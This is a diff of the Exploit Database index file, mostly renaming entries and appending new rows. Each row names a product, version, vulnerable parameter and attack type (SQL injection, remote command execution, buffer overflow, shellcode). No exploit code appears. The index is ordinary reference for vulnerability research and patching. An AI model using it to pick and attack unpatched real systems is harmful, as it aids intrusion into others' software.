31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0
|
||||
31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component 'com_comments' 0.5.8.5g - 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0
|
||||
31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
|
||||
31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
|
||||
31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
|
||||
|
@ -28114,7 +28114,7 @@ id,file,description,date,author,platform,type,port
|
|||
31152,platforms/php/webapps/31152.txt,"artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
|
||||
31153,platforms/php/webapps/31153.txt,"artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
|
||||
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
|
||||
31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - graph.php view_type Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0
|
||||
31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - graph_view.php filter Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0
|
||||
|
@ -28147,9 +28147,9 @@ id,file,description,date,author,platform,type,port
|
|||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
|
||||
31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)",2014-01-31,"Kees Cook",linux,dos,0
|
||||
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
|
||||
31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
|
||||
31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
|
||||
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
|
||||
31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component 'com_most' - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
|
||||
31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component 'com_asortyment' - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
|
||||
31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - spyce/examples/formtag.spy Multiple Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0
|
||||
31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0
|
||||
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
|
||||
|
@ -28159,8 +28159,8 @@ id,file,description,date,author,platform,type,port
|
|||
31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0
|
||||
31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0
|
||||
31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection",2008-02-13,S@BUN,asp,webapps,0
|
||||
31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
|
||||
31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
|
||||
31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
|
||||
31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
|
||||
31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
|
||||
31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
|
||||
31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - main/calendar/myagenda.php courseCode Parameter Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0
|
||||
|
@ -28173,15 +28173,15 @@ id,file,description,date,author,platform,type,port
|
|||
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
|
||||
31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
|
||||
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
|
||||
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
|
||||
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
|
||||
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
|
||||
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0
|
||||
|
@ -28216,10 +28216,10 @@ id,file,description,date,author,platform,type,port
|
|||
31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 - Subject Field HTML Injection",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0
|
||||
31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31243,platforms/php/webapps/31243.txt,"Joomla! / Mambo Component com_team - SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31243,platforms/php/webapps/31243.txt,"Joomla! / Mambo Component 'com_team' - SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component 'com_iigcatalog' - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component 'com_formtool' - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component 'com_genealogy' - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
40356,platforms/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos,0
|
||||
31247,platforms/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
|
||||
|
@ -28256,14 +28256,14 @@ id,file,description,date,author,platform,type,port
|
|||
31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
|
||||
31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
|
||||
31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
|
||||
31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
|
||||
31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component 'com_hello_world' - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
|
||||
31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
|
||||
31290,platforms/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,php,webapps,0
|
||||
31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
|
||||
31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
|
||||
31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component 'com_publication' - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
|
||||
31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component 'com_blog' - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
|
||||
31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
|
||||
31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' Parameter SQL Injection",2008-02-25,-=Mizo=-,php,webapps,0
|
||||
31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
|
||||
31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component 'com_wines' 1.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
|
||||
31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
|
||||
31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
|
||||
31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0
|
||||
|
@ -28271,7 +28271,7 @@ id,file,description,date,author,platform,type,port
|
|||
31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0
|
||||
31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0
|
||||
31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0
|
||||
31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0
|
||||
31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0
|
||||
31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0
|
||||
31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
|
||||
31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0
|
||||
|
@ -28369,7 +28369,7 @@ id,file,description,date,author,platform,type,port
|
|||
31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
|
||||
31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,php,webapps,0
|
||||
31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0
|
||||
31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0
|
||||
31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component 'com_guide' - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0
|
||||
31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0
|
||||
31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0
|
||||
31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0
|
||||
|
@ -28945,7 +28945,7 @@ id,file,description,date,author,platform,type,port
|
|||
32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service",2008-06-30,"Noam Rathus",multiple,dos,0
|
||||
32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
|
||||
32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0
|
||||
32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0
|
||||
32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component 'com_is' 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0
|
||||
32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0
|
||||
32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0
|
||||
32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0
|
||||
|
@ -29107,7 +29107,7 @@ id,file,description,date,author,platform,type,port
|
|||
32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - order.asp page Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0
|
||||
32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - search.asp Filename Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0
|
||||
32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0
|
||||
32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0
|
||||
32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component 'com_utchat' 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0
|
||||
32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0
|
||||
32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0
|
||||
32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0
|
||||
|
@ -30573,7 +30573,7 @@ id,file,description,date,author,platform,type,port
|
|||
33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,php,webapps,0
|
||||
33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0
|
||||
33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
|
||||
33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0
|
||||
33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0
|
||||
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
|
||||
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
|
||||
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0
|
||||
|
@ -30987,7 +30987,7 @@ id,file,description,date,author,platform,type,port
|
|||
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection",2009-12-22,"Hadi Kiamarsi",php,webapps,0
|
||||
34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps,0
|
||||
34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0
|
||||
34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
34291,platforms/php/webapps/34291.txt,"Joomla! Component 'Rapid-Recipe' - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
|
||||
34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0
|
||||
34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
|
||||
|
@ -31053,7 +31053,7 @@ id,file,description,date,author,platform,type,port
|
|||
34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
|
||||
34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
|
||||
34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0
|
||||
34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0
|
||||
34374,platforms/php/webapps/34374.txt,"Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0
|
||||
34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0
|
||||
34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0
|
||||
34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0
|
||||
|
@ -33979,7 +33979,6 @@ id,file,description,date,author,platform,type,port
|
|||
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
|
||||
37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
|
||||
|
@ -35786,7 +35785,7 @@ id,file,description,date,author,platform,type,port
|
|||
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,php,webapps,0
|
||||
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
|
||||
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - 'save_email.php' Arbitrary File Upload",2016-02-17,HaHwul,multiple,webapps,0
|
||||
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
|
||||
39459,platforms/php/webapps/39459.txt,"Redaxo 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
|
||||
39458,platforms/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0
|
||||
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
|
||||
39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
|
||||
|
@ -36283,7 +36282,7 @@ id,file,description,date,author,platform,type,port
|
|||
39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80
|
||||
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
|
||||
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
|
||||
39985,platforms/windows/remote/39985.rb,"DarkComet Server - Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
|
||||
39985,platforms/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
|
||||
39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0
|
||||
39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80
|
||||
39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80
|
||||
|
@ -36784,3 +36783,17 @@ id,file,description,date,author,platform,type,port
|
|||
40690,platforms/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",hardware,webapps,0
|
||||
40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
|
||||
40692,platforms/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",php,webapps,0
|
||||
40693,platforms/windows/remote/40693.py,"WinaXe 7.7 'FTP client' - Remote Buffer Overflow",2016-11-03,hyp3rlinx,windows,remote,0
|
||||
40694,platforms/windows/remote/40694.txt,"Rapid PHP Editor 14.1 - Remote Command Execution",2016-11-03,hyp3rlinx,windows,remote,0
|
||||
40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - PoC (1)",2016-11-01,"p0wd3r / dawu",linux,dos,0
|
||||
40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - PoC (2)",2016-11-01,"p0wd3r / dawu",linux,dos,0
|
||||
40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - PoC (3)",2016-11-01,"p0wd3r / dawu",linux,dos,0
|
||||
40698,platforms/php/webapps/40698.py,"SweetRice 1.5.1 - Arbitrary File Download",2016-11-03,"Ashiyane Digital Security Team",php,webapps,0
|
||||
40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial Of Service",2016-11-03,hyp3rlinx,windows,dos,0
|
||||
40700,platforms/php/webapps/40700.html,"SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution",2016-11-03,"Ashiyane Digital Security Team",php,webapps,0
|
||||
